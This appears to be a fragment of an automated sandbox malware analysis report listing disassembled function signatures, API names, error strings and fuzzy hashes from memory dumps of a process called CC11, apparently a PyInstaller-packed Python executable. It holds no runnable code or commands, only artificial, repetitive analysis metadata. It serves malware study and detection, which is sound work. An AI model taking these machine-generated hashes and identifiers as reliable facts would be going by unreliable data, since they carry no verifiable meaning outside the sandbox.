                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                                                                                                                                  • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                                                                                                                                  • API String ID: 111561578-4068157617
                                                                                                                                                                  • Opcode ID: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                  • Instruction ID: daee6d019701e18aefcbe87488ad599b46d5f6bf77806eea58a4cd0535ff7483
                                                                                                                                                                  • Opcode Fuzzy Hash: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                  • Instruction Fuzzy Hash: 53312772A09B8681EB809FEAE8440B873A4FB89BE4B584136DB5D47761DF3CE494C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$ArgsCallErr_FunctionObject_Occurredffi_callffi_prep_cifmemset
                                                                                                                                                                  • String ID: argument %zd:
                                                                                                                                                                  • API String ID: 3446152234-2109984780
                                                                                                                                                                  • Opcode ID: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                  • Instruction ID: f82d38600435c94539692823037c7c1039e85f8cf3a786ac204744820d54e13b
                                                                                                                                                                  • Opcode Fuzzy Hash: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EA1B023B09B8285EA608FA9D8402B96B60FF40BE4F584636DB6E47BD5DF3CE5518300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallFunctionObject_$ArgsDeallocFromLongLong_SubtypeTraceback_Type_
                                                                                                                                                                  • String ID: GetResult$_ctypes/callproc.c
                                                                                                                                                                  • API String ID: 276671208-4166898048
                                                                                                                                                                  • Opcode ID: 530bc2d210fd3b323a0918ef7c54ceed0a47631cf21d4f88d000686fb3151742
                                                                                                                                                                  • Instruction ID: db2a2b7f4308bcb1e8af2c45f0b5d28d18e354dc79ca0d168b02d27db4f6b552
                                                                                                                                                                  • Opcode Fuzzy Hash: 530bc2d210fd3b323a0918ef7c54ceed0a47631cf21d4f88d000686fb3151742
                                                                                                                                                                  • Instruction Fuzzy Hash: FA518C21A0EA42C2EB599B9EE95027877A5EF85BC1F584431DB4E076A6DF3CF445C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$CharStringUnicode_Wide$DeallocFormat
                                                                                                                                                                  • String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
                                                                                                                                                                  • API String ID: 1407654538-1577475929
                                                                                                                                                                  • Opcode ID: 9bc8028b2fc0058224e388ff4d436136f2b49ea49f03b5c1889dff7a5873b68a
                                                                                                                                                                  • Instruction ID: 39dc8c46a1e687e38401110b09d1f50072912a65fc79e0433e6f401ae039af40
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bc8028b2fc0058224e388ff4d436136f2b49ea49f03b5c1889dff7a5873b68a
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A314C61B09A4681EB109F9EE8801BA7760FB84FE4F149636DB2D47BA9DF3CE445C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
                                                                                                                                                                  • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                                                                                                                                  • API String ID: 920172908-178309214
                                                                                                                                                                  • Opcode ID: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                  • Instruction ID: 4b5324d77e8f56e985c4af0e86cc2dda57dbd9ac910277eed4f750e025a6ba68
                                                                                                                                                                  • Opcode Fuzzy Hash: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                  • Instruction Fuzzy Hash: F721F326A1AA4681EA94CFDAE8540782760FFC8BD0F544036EB4E87765DE3CE498C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$DeallocString$Formatmemcpy
                                                                                                                                                                  • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                                                                                                                                  • API String ID: 1948958528-1866040848
                                                                                                                                                                  • Opcode ID: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                  • Instruction ID: 0b4ba0c1f71c568ae2da59748167b1e2c025f755f6426a31e1424f6942f9d65f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                  • Instruction Fuzzy Hash: A1213771A08A4281EB909FAEE8801BDB7A5FB85FD8F105132DB1E47A65DF3CE485C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                  • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                  • Instruction ID: 3d5f9ccb389d88129d6bb2f97625036bd48733d362898b3ed4318b1cd36e3df2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                  • Instruction Fuzzy Hash: 42129061E0C243A6FB319A3DE1542797691FB40752F944176E689C7BCCEF3CE9828B08
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                  • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                  • Instruction ID: 0a7f252f09a8ebe5459d82713e5bfd62826b94b451eaf8231740437f5ab60462
                                                                                                                                                                  • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                  • Instruction Fuzzy Hash: E312A572E0C343A6FB309A28E05477A7251FB80754F844076E69A877CEDF7CE5A68B50
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB71E9F
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: _PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB7204C
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: PySequence_Tuple.PYTHON38 ref: 00007FF8BFB7206F
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: _PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB720A0
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: PySys_Audit.PYTHON38 ref: 00007FF8BFB720D1
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB720EA
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB72113
                                                                                                                                                                    • Part of subcall function 00007FF8BFB72010: PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72126
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Arg_Long_ParseSizeTuple_Void$AttrAuditErr_Object_OccurredSequence_StringSys_Tuple
                                                                                                                                                                  • String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes
                                                                                                                                                                  • API String ID: 4181388754-2742191083
                                                                                                                                                                  • Opcode ID: 95199a011234cc55058fc8dd18c5086f66689566921fae72a51de8fa4d81df3f
                                                                                                                                                                  • Instruction ID: aab5f95ceb0ec556e4aa865b253e496b43499783934de60e94251d5fdea2ec0d
                                                                                                                                                                  • Opcode Fuzzy Hash: 95199a011234cc55058fc8dd18c5086f66689566921fae72a51de8fa4d81df3f
                                                                                                                                                                  • Instruction Fuzzy Hash: 81513A61A09B4280EA649FAED8501796BA1FF85FC4F188435DF4E47B99DF2CE451C350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc
                                                                                                                                                                  • String ID: wrong type
                                                                                                                                                                  • API String ID: 3617616757-2191655096
                                                                                                                                                                  • Opcode ID: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                  • Instruction ID: 0cad9f02691801400bcd75e6172d3e7b3581136e1c9949ab18bf30729801e771
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                  • Instruction Fuzzy Hash: F5513C61A0AA4381FE549F9DD9501796BA2EF84BC0F588435DB0E4B7A9EF2CF894C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc
                                                                                                                                                                  • String ID: wrong type
                                                                                                                                                                  • API String ID: 3617616757-2191655096
                                                                                                                                                                  • Opcode ID: 145fd6ca234b13e2fd656f9f0c6ee79a1be4d5a2110f2a11c1c077804be63fb0
                                                                                                                                                                  • Instruction ID: 93c9d1d3a6e99351a01373163a48a219135711e3e8fde40955ad1a5fb65f231c
                                                                                                                                                                  • Opcode Fuzzy Hash: 145fd6ca234b13e2fd656f9f0c6ee79a1be4d5a2110f2a11c1c077804be63fb0
                                                                                                                                                                  • Instruction Fuzzy Hash: 325170A1A0AA4380FF549F9EE8411792BA5FF84BC4F588439DB0E477A1EF2CE854C300
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                  • Opcode ID: 750ca65755054052001ce73cd94522abe208fb5e67e319a3994d9d9bd6faa566
                                                                                                                                                                  • Instruction ID: 4ff96e2b5d55b41244753c365462c7c41f58a6b64fbfac0f938fdf32817bb11c
                                                                                                                                                                  • Opcode Fuzzy Hash: 750ca65755054052001ce73cd94522abe208fb5e67e319a3994d9d9bd6faa566
                                                                                                                                                                  • Instruction Fuzzy Hash: A6417E21B0864272EA759B36A8406FAA3A5FF44BCCF544071EE4D87B9DEE3CE5458700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                  • Instruction ID: 98b1619266e7276d40818b8af2a6d3fe626508889facaf9dce3d4a688e65152f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                  • Instruction Fuzzy Hash: 25411C32A18B8291DA309B34F4552AE73A1FBC9364F500375E6AD877D9DF7CD1458B40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallDeallocDict_Err_MallocMem_MemoryObjectObject_Update
                                                                                                                                                                  • String ID: X{}
                                                                                                                                                                  • API String ID: 3334104440-2140212134
                                                                                                                                                                  • Opcode ID: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                  • Instruction ID: 777695070a465879e8142fd289ac50bc93ef4738ae5d48bc954743cf291dd9e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                  • Instruction Fuzzy Hash: E9316D31A0DB8285EB558FA9E9542B87BA0EF89BD0F588530CB5E43B95DF3CE584C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InstanceObject_$Err_Format
                                                                                                                                                                  • String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
                                                                                                                                                                  • API String ID: 215623467-1082101171
                                                                                                                                                                  • Opcode ID: 7daf5171bb28265ae10482dd7f65e8456ce21089f6e24e5c542b3d35427a2017
                                                                                                                                                                  • Instruction ID: eae9dd88c0526ee0a2abe942c0bca89d2c7b3f3c0534c961a09a214b40d4e6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 7daf5171bb28265ae10482dd7f65e8456ce21089f6e24e5c542b3d35427a2017
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B315A21A09A4381EA948FAAE4401B9A7A5FF88FD4F144532EF1E47BA5DF2CF845C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
                                                                                                                                                                  • String ID: byte string too long$cannot delete attribute
                                                                                                                                                                  • API String ID: 1128862751-688604938
                                                                                                                                                                  • Opcode ID: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                  • Instruction ID: 30309f05f6ebdcb279f0e96bad639b8c0f57db46c84a960412b0ef56de573119
                                                                                                                                                                  • Opcode Fuzzy Hash: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                  • Instruction Fuzzy Hash: E0011761A1AA4681EF50EFE9E8500B96360FFC4FD5B504232DA5E86AA5DE2DE544C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeallocDict_$Err_ErrorItemObject_OccurredWith$AttrCallMakeUpdate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3530831742-0
                                                                                                                                                                  • Opcode ID: e1901c3f67c9cc1b02f91d214b5f4b6f328cd1706827d80eeb8e9729a1f67c59
